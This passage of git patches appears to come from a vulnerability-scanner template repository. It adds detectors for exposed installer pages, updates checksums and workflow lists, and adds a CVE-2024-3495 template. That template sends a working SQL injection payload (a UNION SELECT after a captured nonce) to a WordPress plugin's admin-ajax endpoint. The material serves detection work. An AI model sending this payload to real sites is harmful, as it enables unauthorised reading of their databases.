http/exposures/tokens/twitter/twitter-client-id.yaml:c92de370ea212c866b8ebafe350c419de4396c78 http/exposures/tokens/twitter/twitter-secret-key.yaml:80a9e988a78092fb9f2d856018f6fdecfc44ea67 -http/exposures/tokens/wechat/wechat-secret-key.yaml:c084c1779c30ee4c681c3694d6bc59a00240340a +http/exposures/tokens/wechat/wechat-secret-key.yaml:70cf383050476626584c85aa1e297c7262a8b2db http/exposures/tokens/wireguard/wireguard-preshared-key.yaml:b1b834fca36f5387b0992472dfc8e65ad7182add http/exposures/tokens/wireguard/wireguard-private-key.yaml:bdbd1193a2679747f217b7f189bc1681bc7ac2d4 http/exposures/tokens/zapier/zapier-webhook-token.yaml:2003b8aeff54e5608d7205ef0ce7d723022efe99 @@ -5406,6 +5406,7 @@ http/misconfiguration/installer/chamilo-installer.yaml:a0c0b5aeeb609610b3c883600 http/misconfiguration/installer/circarlife-setup.yaml:a156b34f363e32ba5b727edf8e4c1334c8d7c49a http/misconfiguration/installer/clipbucket-installer.yaml:953b61e17da228a814a1ea84ac3ff2e0579a4804 http/misconfiguration/installer/cloudcenter-Installer.yaml:962ce42554b0a67568e837ed06e88025c78a610c +http/misconfiguration/installer/cms-made-simple-installer.yaml:b928a746fbe5cd2e551019a88715cbc797d71104 http/misconfiguration/installer/codeigniter-installer.yaml:fd1d80362d9f4c812f2a205c0db51bd4a970afc8 http/misconfiguration/installer/combodo-itop-installer.yaml:a7551d44c75895abdb04ecb2762433101a90a11e http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a221e3f9d836d7e402 @@ -5499,7 +5500,7 @@ http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d3 http/misconfiguration/installer/sms-installer.yaml:c9d601c3fcdab053214228580512c01923e6aeb3 http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:14a25f5be35d80683649fcac189993c8c514ee23 -http/misconfiguration/installer/stackposts-installer.yaml:2fb3f671a7bcb4be5998f1e9db135239538e8448 +http/misconfiguration/installer/stackposts-installer.yaml:29af347900e7b1f9fd77a04fe02dfbf89020028f http/misconfiguration/installer/sugarcrm-install.yaml:a253a2bb6995ab8232ce780dcfaa5fa60f3a40ca http/misconfiguration/installer/suitecrm-installer.yaml:0c39360372f4dd838d49b82ba353aecb8a6d6b3b http/misconfiguration/installer/sumowebtools-installer.yaml:fd2852a171b68f3b8f5290b80da4c84daa1afbcc @@ -8579,7 +8580,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:21e631f5b2cb4128a1efae8498bae65ffa6c352f +templates-checksum.txt:bc9e62dba93d4e247f4aa36b1ec2fd22620a75d1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c0f73ceaa8f124ea6a1cf74389638b511d05bd96 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 16:35:48 +0000 Subject: [PATCH 1464/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 35fde475e5..da22c5fd86 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -16,6 +16,7 @@ on: - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' + - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' From 0f98533c8995a6ce5dcaf75a9cc1081d60f4a7f7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 16:36:23 +0000 Subject: [PATCH 1465/1768] Auto Generated New Template Addition List [Tue May 28 16:36:23 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 63c8295176..964b89e7cd 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-5230.yaml +http/default-logins/ampjuke-default-login.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/cisco-firepower-panel.yaml From be5ad5ed37632747bf93f05f8706812975dfa23c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 16:36:36 +0000 Subject: [PATCH 1466/1768] Auto Generated Templates Checksum [Tue May 28 16:36:36 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f831f09a99..4eeb1d9544 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3325,6 +3325,7 @@ http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc http/default-logins/allnet/allnet-default-login.yaml:bdc1b0fae7b08909a071f9b452800f8b37b4b2ea http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9 http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe +http/default-logins/ampjuke-default-login.yaml:dcd5fb3f7636832265548e0ab1c8d4dba89a11a4 http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b http/default-logins/apache/apisix-default-login.yaml:88d0d5d11425c2cadb204d0afb7b26d8df4376fe http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 @@ -8580,7 +8581,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:bc9e62dba93d4e247f4aa36b1ec2fd22620a75d1 +templates-checksum.txt:c57bb8f7de4b36023acff4442e06229729d6ebc9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 46bda4148a42599b0717f34507c4c3cb2ab071f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 16:36:50 +0000 Subject: [PATCH 1467/1768] Auto Template Signing [Tue May 28 16:36:50 UTC 2024] :robot: --- http/misconfiguration/installer/cms-made-simple-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/cms-made-simple-installer.yaml b/http/misconfiguration/installer/cms-made-simple-installer.yaml index 85a805cd0e..0b7a9e40ec 100644 --- a/http/misconfiguration/installer/cms-made-simple-installer.yaml +++ b/http/misconfiguration/installer/cms-made-simple-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100ab7397bf22e61def290fd2775918114d25396aa0d5788b62d123f84492e0b8c10220695e11f4c8e0bd63a84e3a22f3c6c6f95fb2674adf8cf7bcdb065bcf3c5bdb90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 47acd7e49568c00a85a6ee308ae80e39492cebc4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 16:37:05 +0000 Subject: [PATCH 1468/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index da22c5fd86..ea6701ee60 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' + - 'http/default-logins/ampjuke-default-login.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' From 18d6fd7a4385e1d6357960844f29dcac37f51a6e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 23:31:41 +0530 Subject: [PATCH 1469/1768] Create invicti-enterprise-installer.yaml --- .../invicti-enterprise-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/invicti-enterprise-installer.yaml diff --git a/http/misconfiguration/installer/invicti-enterprise-installer.yaml b/http/misconfiguration/installer/invicti-enterprise-installer.yaml new file mode 100644 index 0000000000..97b5fd79e7 --- /dev/null +++ b/http/misconfiguration/installer/invicti-enterprise-installer.yaml @@ -0,0 +1,31 @@ +id: invicti-enterprise-installer + +info: + name: Invicti Enterprise Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Invicti Enterprise Installation page. + reference: + - https://www.invicti.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Invicti Enterprise - Installation Wizard" + tags: misconfig,install,exposure,invicti + +http: + - method: GET + path: + - "{{BaseURL}}/wizard/database/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Invicti Enterprise - Installation Wizard" + + - type: status + status: + - 200 From 0731835b4ab41a083d0292e9da48cc2565601db1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 23:35:33 +0530 Subject: [PATCH 1470/1768] Create ejbca-enterprise-installer.yaml --- .../installer/ejbca-enterprise-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/ejbca-enterprise-installer.yaml diff --git a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml new file mode 100644 index 0000000000..149bfaba41 --- /dev/null +++ b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml @@ -0,0 +1,31 @@ +id: ejbca-enterprise-installer + +info: + name: EJBCA Enterprise Cloud Configuration Wizard - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed EJBCA Enterprise Cloud Installation page. + reference: + - https://aws.amazon.com/marketplace/pp/prodview-u2xdo5mkuilke + metadata: + verified: true + max-request: 1 + shodan-query: html:"EJBCA Enterprise Cloud Configuration Wizard" + tags: misconfig,install,exposure,ejbca + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "EJBCA Enterprise Cloud Configuration Wizard" + + - type: status + status: + - 200 From f18f623d62116daf37d3c30b576fa35c6eddfc64 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 23:40:49 +0530 Subject: [PATCH 1471/1768] Create uvdesk-helpdesk-installer.yaml --- .../installer/uvdesk-helpdesk-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml diff --git a/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml b/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml new file mode 100644 index 0000000000..2a4069893e --- /dev/null +++ b/http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml @@ -0,0 +1,31 @@ +id: uvdesk-helpdesk-installer + +info: + name: UVDesk Helpdesk Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed UVDesk Helpdesk Installation page. + reference: + - https://www.uvdesk.com/en/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"UVDesk Helpdesk Community Edition - Installation Wizard" + tags: misconfig,install,exposure,uvdesk,helpdesk + +http: + - method: GET + path: + - "{{BaseURL}}/#welcome" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "UVDesk Helpdesk Community Edition - Installation Wizard" + + - type: status + status: + - 200 From e6b6ac12c9d022190f66b71cc6bc01ece5907469 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 11:31:58 +0530 Subject: [PATCH 1472/1768] Create tastyigniter-installer.yaml --- .../installer/tastyigniter-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/tastyigniter-installer.yaml diff --git a/http/misconfiguration/installer/tastyigniter-installer.yaml b/http/misconfiguration/installer/tastyigniter-installer.yaml new file mode 100644 index 0000000000..a455d46fd5 --- /dev/null +++ b/http/misconfiguration/installer/tastyigniter-installer.yaml @@ -0,0 +1,31 @@ +id: tastyigniter-installer + +info: + name: TastyIgniter Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed TastyIgniter Setup page. + reference: + - https://tastyigniter.com/ + metadata: + verified: true + max-request: 1 + fofa-query: body="TastyIgniter - Setup - License agreement" + tags: misconfig,install,exposure,tastyigniter + +http: + - method: GET + path: + - "{{BaseURL}}/setup/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TastyIgniter - Setup" + + - type: status + status: + - 200 From 306c7764a5eef50ce9823bda4af7d1f46769e083 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 11:45:32 +0530 Subject: [PATCH 1473/1768] Create glpi-installer.yaml --- .../installer/glpi-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/glpi-installer.yaml diff --git a/http/misconfiguration/installer/glpi-installer.yaml b/http/misconfiguration/installer/glpi-installer.yaml new file mode 100644 index 0000000000..9db17a527d --- /dev/null +++ b/http/misconfiguration/installer/glpi-installer.yaml @@ -0,0 +1,31 @@ +id: glpi-installer + +info: + name: GLPI Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed GLPI Setup page. + reference: + - https://glpi-project.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Setup GLPI" + tags: misconfig,install,exposure,glpi + +http: + - method: GET + path: + - "{{BaseURL}}/install/install.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Setup GLPI" + + - type: status + status: + - 200 From c60505d30754b428649b8b2a3cf62540a300aae6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 11:49:42 +0530 Subject: [PATCH 1474/1768] Create jfa-go-installer.yaml --- .../installer/jfa-go-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/jfa-go-installer.yaml diff --git a/http/misconfiguration/installer/jfa-go-installer.yaml b/http/misconfiguration/installer/jfa-go-installer.yaml new file mode 100644 index 0000000000..5909fa7972 --- /dev/null +++ b/http/misconfiguration/installer/jfa-go-installer.yaml @@ -0,0 +1,31 @@ +id: jfa-go-installer + +info: + name: jfa-go Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed jfa-go Setup page. + reference: + - https://github.com/hrfee/jfa-go + metadata: + verified: true + max-request: 1 + shodan-query: html:"Setup - jfa-go" + tags: misconfig,install,exposure,jfa-go + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Setup - jfa-go" + + - type: status + status: + - 200 From 331ba388a7353f5ee763ee75008109c136910833 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 29 May 2024 11:54:51 +0530 Subject: [PATCH 1475/1768] Create CVE-2024-3495.yaml --- http/cves/2024/CVE-2024-3495.yaml | 52 +++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3495.yaml diff --git a/http/cves/2024/CVE-2024-3495.yaml b/http/cves/2024/CVE-2024-3495.yaml new file mode 100644 index 0000000000..d057c9feac --- /dev/null +++ b/http/cves/2024/CVE-2024-3495.yaml @@ -0,0 +1,52 @@ +id: CVE-2024-3495 + +info: + name: Wordpress Country State City Dropdown <=2.7.2 - SQL Injection + author: apple + severity: high + description: | + The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://sploitus.com/exploit?id=EDF4B3F8-DDF4-5196-A375-EC81B8BC18F1&utm_source=rss&utm_medium=rss + - https://github.com/truonghuuphuc/CVE-2024-3495-Poc + - https://nvd.nist.gov/vuln/detail/CVE-2024-3495 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-3495 + cwe-id: CWE-89 + metadata: + max-request: 2 + verified: true + publicwww-query: "/wp-content/plugins/country-state-city-auto-dropdown" + tags: cve,cve2024,wp,wp-plugin,wordpress,sqli + +variables: + num: "999999999" + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=tc_csca_get_cities&nonce_ajax={{nonce}}&sid=1+or+0+union+select+concat(0x64617461626173653a,(select%20md5({{num}})),0x7c76657273696f6e3a,(select%20md5({{num}})),0x7c757365723a,user()),2,3--+- + + matchers: + - type: word + part: body_2 + words: + - '{{md5(num)}}' + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '"nonce":"(\S*)"' + internal: true From cb125a852cf1945550acf9731019d849f63d1271 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 29 May 2024 13:26:26 +0700 Subject: [PATCH 1476/1768] fix: false negative fortiweb-panel.yaml --- http/exposed-panels/fortinet/fortiweb-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/fortinet/fortiweb-panel.yaml b/http/exposed-panels/fortinet/fortiweb-panel.yaml index 44d8cbc9a9..76942ae247 100644 --- a/http/exposed-panels/fortinet/fortiweb-panel.yaml +++ b/http/exposed-panels/fortinet/fortiweb-panel.yaml @@ -2,7 +2,7 @@ id: fortiweb-login info: name: Fortinet FortiWeb Login Panel - Detect - author: PR3R00T + author: PR3R00T,daffainfo severity: info description: Fortinet FortiWeb login panel was detected. classification: @@ -11,6 +11,7 @@ info: cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 1 + shodan-query: http.title:"FortiWeb - " product: fortiweb vendor: fortinet tags: panel,fortinet,fortiweb,login @@ -27,10 +28,9 @@ http: words: - "Please login" - "ftnt-fortinet-grid" - - "main-fortiweb.css" condition: and - type: status status: - 200 -# digest: 4b0a00483046022100903d0b01156fa0e1e1e76dbcc24d8cb562c86a57525a5d88ec5c675f4331fdd3022100b5f3290d941b6e6afd66f7a09b92b23651f4abce54ef8f8a365920e23746cd81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100903d0b01156fa0e1e1e76dbcc24d8cb562c86a57525a5d88ec5c675f4331fdd3022100b5f3290d941b6e6afd66f7a09b92b23651f4abce54ef8f8a365920e23746cd81:922c64590222798bb761d5b6d8e72950 From 7464f6ef0bf89434a94dff7d4fb29dada2378be3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 12:03:05 +0530 Subject: [PATCH 1477/1768] Create profittrailer-installer.yaml --- .../installer/profittrailer-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/profittrailer-installer.yaml diff --git a/http/misconfiguration/installer/profittrailer-installer.yaml b/http/misconfiguration/installer/profittrailer-installer.yaml new file mode 100644 index 0000000000..ed33927a01 --- /dev/null +++ b/http/misconfiguration/installer/profittrailer-installer.yaml @@ -0,0 +1,31 @@ +id: profittrailer-installer + +info: + name: ProfitTrailer Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed ProfitTrailer Setup page. + reference: + - https://profittrailer.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"ProfitTrailer Setup" + tags: misconfig,install,exposure,profittrailer + +http: + - method: GET + path: + - "{{BaseURL}}/setup/license" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ProfitTrailer Setup" + + - type: status + status: + - 200 From ade9b2a6afc61cc787a40510e6e88510a4c62c37 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 12:10:53 +0530 Subject: [PATCH 1478/1768] Create onlyoffice-installer.yaml --- .../installer/onlyoffice-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/misconfiguration/installer/onlyoffice-installer.yaml diff --git a/http/misconfiguration/installer/onlyoffice-installer.yaml b/http/misconfiguration/installer/onlyoffice-installer.yaml new file mode 100644 index 0000000000..a8b696489d --- /dev/null +++ b/http/misconfiguration/installer/onlyoffice-installer.yaml @@ -0,0 +1,33 @@ +id: onlyoffice-installer + +info: + name: OnlyOffice Wizard Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed OnlyOffice Setup page. + reference: + - https://www.onlyoffice.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Portal Setup" + tags: misconfig,install,exposure,onlyoffice + +http: + - method: GET + path: + - "{{BaseURL}}/Wizard.aspx" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Portal Setup" + - "onlyoffice" + condition: and + + - type: status + status: + - 200 From f830f4659ad9a33cef92536869c0fd1034e46ca4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 12:21:21 +0530 Subject: [PATCH 1479/1768] Create activecollab-installer.yaml --- .../installer/activecollab-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/activecollab-installer.yaml diff --git a/http/misconfiguration/installer/activecollab-installer.yaml b/http/misconfiguration/installer/activecollab-installer.yaml new file mode 100644 index 0000000000..fc9b129292 --- /dev/null +++ b/http/misconfiguration/installer/activecollab-installer.yaml @@ -0,0 +1,31 @@ +id: activecollab-installer + +info: + name: ActiveCollab Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed ActiveCollab Installation page. + reference: + - https://activecollab.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"ActiveCollab Installer" + tags: misconfig,install,exposure,activecollab + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ActiveCollab Installer" + + - type: status + status: + - 200 From 217e1229475c332f2b1ca44d4245f9c7b997d183 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 13:22:08 +0530 Subject: [PATCH 1480/1768] Create virtual-smartzone-installer.yaml --- .../virtual-smartzone-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/misconfiguration/installer/virtual-smartzone-installer.yaml diff --git a/http/misconfiguration/installer/virtual-smartzone-installer.yaml b/http/misconfiguration/installer/virtual-smartzone-installer.yaml new file mode 100644 index 0000000000..31adce8ade --- /dev/null +++ b/http/misconfiguration/installer/virtual-smartzone-installer.yaml @@ -0,0 +1,33 @@ +id: virtual-smartzone-installer + +info: + name: Virtual SmartZone Setup Wizard - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Virtual SmartZone Installation page. + reference: + - https://support.ruckuswireless.com/products/83-virtual-smartzone-vsz + metadata: + verified: true + max-request: 1 + shodan-query: html:"Virtual SmartZone" + tags: misconfig,install,exposure,virtual-smartzone + +http: + - method: GET + path: + - "{{BaseURL}}/adminweb/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Virtual SmartZone" + - "Setup Wizard" + condition: and + + - type: status + status: + - 200 From 1d01b279795e611390bc0e874f89a3c57a86ab86 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 13:26:16 +0530 Subject: [PATCH 1481/1768] minor update --- http/cves/2024/CVE-2024-3495.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-3495.yaml b/http/cves/2024/CVE-2024-3495.yaml index d057c9feac..076e2dc12d 100644 --- a/http/cves/2024/CVE-2024-3495.yaml +++ b/http/cves/2024/CVE-2024-3495.yaml @@ -3,21 +3,25 @@ id: CVE-2024-3495 info: name: Wordpress Country State City Dropdown <=2.7.2 - SQL Injection author: apple - severity: high + severity: critical description: | The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. reference: - https://sploitus.com/exploit?id=EDF4B3F8-DDF4-5196-A375-EC81B8BC18F1&utm_source=rss&utm_medium=rss - https://github.com/truonghuuphuc/CVE-2024-3495-Poc - https://nvd.nist.gov/vuln/detail/CVE-2024-3495 + - https://plugins.trac.wordpress.org/browser/country-state-city-auto-dropdown/trunk/includes/ajax-actions.php#L22 + - https://plugins.trac.wordpress.org/browser/country-state-city-auto-dropdown/trunk/includes/ajax-actions.php#L8 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-3495 cwe-id: CWE-89 + epss-score: 0.00065 + epss-percentile: 0.28393 metadata: - max-request: 2 verified: true + max-request: 2 publicwww-query: "/wp-content/plugins/country-state-city-auto-dropdown" tags: cve,cve2024,wp,wp-plugin,wordpress,sqli From abadfe39f2320ae3139026bcf87cc1435592a881 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 07:57:51 +0000 Subject: [PATCH 1482/1768] Auto Generated New Template Addition List [Wed May 29 07:57:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 964b89e7cd..063d342aed 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml +http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml From 24df04278c655894c032b3cea03b12e07e8af9f7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 07:57:55 +0000 Subject: [PATCH 1483/1768] Auto Generated Templates Checksum [Wed May 29 07:57:55 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4eeb1d9544..cfc7658464 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3631,6 +3631,7 @@ http/exposed-panels/bonobo-server-panel.yaml:43a9e4867d71b96735ed7204ac8188a73e8 http/exposed-panels/bookstack-panel.yaml:6aa200c15b16ebfaa41c6ede6c814ccae56115fb http/exposed-panels/buddy-panel.yaml:612c814fabd73cab9fbcabc30169454db23c583b http/exposed-panels/buildbot-panel.yaml:c61b26d17d36adafb7f6642b12d64078e3aebc15 +http/exposed-panels/busybox-repository-browser.yaml:fedbe7dab622d91bf01cf75e62d0a9637d975736 http/exposed-panels/bynder-panel.yaml:6cb1f105a7d932e3123174ce57392fd0e4238a9d http/exposed-panels/c2/ares-rat-c2.yaml:1aac3bf878b995e385e7543bf774dd43c1c9a498 http/exposed-panels/c2/brute-ratel-c4.yaml:f2c6438699c51caca084e6ceddebfc4caf1414e2 @@ -5407,7 +5408,7 @@ http/misconfiguration/installer/chamilo-installer.yaml:a0c0b5aeeb609610b3c883600 http/misconfiguration/installer/circarlife-setup.yaml:a156b34f363e32ba5b727edf8e4c1334c8d7c49a http/misconfiguration/installer/clipbucket-installer.yaml:953b61e17da228a814a1ea84ac3ff2e0579a4804 http/misconfiguration/installer/cloudcenter-Installer.yaml:962ce42554b0a67568e837ed06e88025c78a610c -http/misconfiguration/installer/cms-made-simple-installer.yaml:b928a746fbe5cd2e551019a88715cbc797d71104 +http/misconfiguration/installer/cms-made-simple-installer.yaml:bd77905eec6dd64638779bd3316e66859c23446e http/misconfiguration/installer/codeigniter-installer.yaml:fd1d80362d9f4c812f2a205c0db51bd4a970afc8 http/misconfiguration/installer/combodo-itop-installer.yaml:a7551d44c75895abdb04ecb2762433101a90a11e 